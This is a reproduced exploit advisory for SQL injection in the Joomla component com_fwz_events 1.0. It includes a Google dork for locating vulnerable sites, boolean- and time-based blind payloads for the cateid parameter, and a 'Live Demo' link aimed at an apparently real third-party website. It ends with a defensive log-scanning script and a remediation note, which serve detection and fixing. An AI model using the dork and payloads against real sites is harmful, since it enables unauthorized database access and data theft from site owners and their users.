CVE | Category | Price | Severity |
---|---|---|---|
| | CWE-89 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Exploit Alert | High | Remote | 2017-06-11 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
Joomla COM_FWZ_EVENTS 1.0 SQL injection Vulnerability

```
# Exploit Title  : Joomla COM_FWZ_EVENTS 1.0 SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork           : inurl:index.php?option=com_fwz_events
# version        : 1.0
# Tested on      : [Ubuntu 17.04]
# MyBlog         : http://xbadgirl21.blogspot.com
# Date           : 11-06-2017
# video Proof    : https://youtu.be/tJ6jnMlcBsc
# To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz

[+] PoC :
[cateid] Get Parameter Vulnerable To SQLi
http://127.0.0.1/index.php?option=com_fwz_events&view=event&cateid=2&Itemid=120&published_date=2016-02-28&id_item=140

[+] SQLmap PoC:
Parameter: cateid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: option=com_fwz_events&view=event&cateid=2 AND 6849=6849&Itemid=120&published_date=2016-02-28&id_item=140

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: option=com_fwz_events&view=event&cateid=2 AND SLEEP(5)&Itemid=120&published_date=2016-02-28&id_item=140

[!] Live Demo :
http://www.pow.com.sg/index.php?option=com_fwz_events&view=event&cateid=2&Itemid=120&published_date=2016-02-28&id_item=140

# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers
```
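For defenders, the advisory's finding (a `cateid` GET parameter on `com_fwz_events` that accepts SQL fragments) translates into a simple log check: any request to that component whose `cateid` is not a plain integer deserves a look. The following is an added example, not code from the advisory or the component; the log format (combined access log), function names and sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target HTTP/x.y".
# The target is matched lazily so raw (unencoded) spaces are tolerated.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.+?) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"\d+")

def suspicious_cateid(log_line):
    """Return cateid values in a com_fwz_events request that are not plain integers."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    # parse_qs URL-decodes values, so %20 and + both become spaces.
    query = parse_qs(urlsplit(match.group("target")).query, keep_blank_values=True)
    if "com_fwz_events" not in query.get("option", []):
        return []
    return [v for v in query.get("cateid", []) if not INTEGER_RE.fullmatch(v)]

def scan(lines):
    """Return (line_number, client_ip, bad_values) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        bad = suspicious_cateid(line)
        if bad:
            hits.append((number, line.split(" ", 1)[0], bad))
    return hits

# Constructed sample log (documentation IPs); the non-integer values are the
# two sqlmap payloads quoted in the advisory, URL-encoded as a server logs them.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jun/2017:10:00:01 +0000] "GET /index.php?option=com_fwz_events&view=event&cateid=2&Itemid=120 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [11/Jun/2017:10:00:07 +0000] "GET /index.php?option=com_fwz_events&view=event&cateid=2%20AND%206849=6849&Itemid=120 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [11/Jun/2017:10:00:09 +0000] "GET /index.php?option=com_fwz_events&view=event&cateid=2+AND+SLEEP(5)&Itemid=120 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [11/Jun/2017:10:00:12 +0000] "GET /index.php?option=com_content&cateid=abc HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for number, client, values in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent non-integer cateid {values}")
```

Log review only shows that the parameter was probed. The durable fix is in the component itself: cast `cateid` to an integer or bind it as a query parameter before it reaches the SQL statement.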